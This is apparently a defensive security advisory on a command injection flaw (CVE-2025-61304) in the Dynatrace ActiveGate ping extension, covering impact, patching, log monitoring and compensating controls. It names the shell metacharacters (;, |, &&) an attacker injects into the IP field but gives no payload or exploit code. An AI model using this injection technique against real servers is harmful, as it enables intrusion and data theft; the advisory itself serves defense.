A critical OS command injection vulnerability, identified as CVE-2025-61304, has been discovered in the Dynatrace ActiveGate ping extension. This flaw allows an unauthenticated, remote attacker to execute arbitrary commands on the underlying server by sending a specially crafted IP address, potentially leading to a complete system compromise. Due to its critical severity (CVSS 9.8), immediate remediation is required to prevent unauthorized access and control of affected systems.

This vulnerability is an OS command injection flaw within the ping extension of Dynatrace ActiveGate. The function responsible for performing a ping check does not properly sanitize the IP address input provided by the user. An attacker can exploit this by injecting shell metacharacters (e.g., ;, |, &&) followed by arbitrary OS commands into the IP address field. When the extension executes the ping command, the injected commands are also executed on the host operating system with the privileges of the ActiveGate service account.

This vulnerability is rated as critical severity with a CVSS score of 9.8. Successful exploitation could lead to a complete compromise of the Dynatrace ActiveGate server. The potential consequences include theft of sensitive monitoring data and credentials, disruption of critical monitoring services, and using the compromised server as a pivot point for lateral movement into the broader corporate network. This poses a significant risk to the confidentiality, integrity, and availability of the organization's IT infrastructure and the data it processes.

Immediate Action: Update the Dynatrace ActiveGate ping extension to the latest version available from the vendor, which addresses this vulnerability. After patching, it is crucial to monitor for any signs of post-exploitation activity and review system and application access logs for any indicators of compromise that may have occurred prior to remediation.

Proactive Monitoring: Organizations should actively monitor for exploitation attempts. Review ActiveGate logs and system-level command execution logs for unusual or malformed IP addresses containing shell metacharacters. Monitor network traffic for unexpected outbound connections from ActiveGate servers, which could indicate a reverse shell or data exfiltration. Implement alerts for suspicious processes spawned by the ActiveGate service.

Compensating Controls: If immediate patching is not feasible, consider the following compensating controls:

• Disable or uninstall the ActiveGate ping extension if its functionality is not business-critical.
• Implement strict network segmentation to limit access to the ActiveGate host to only trusted administrative sources.
• Utilize an Intrusion Prevention System (IPS) or Web Application Firewall (WAF) with rules designed to detect and block command injection attack patterns.

Public Exploit Available: False

Given the critical CVSS score of 9.8 and the high potential for complete system compromise, this vulnerability represents a severe and immediate risk to the organization. We strongly recommend that all affected instances of the Dynatrace ActiveGate ping extension be updated to a patched version with the highest priority. The ease of exploitation for this type of flaw means that proactive patching is the only effective long-term mitigation.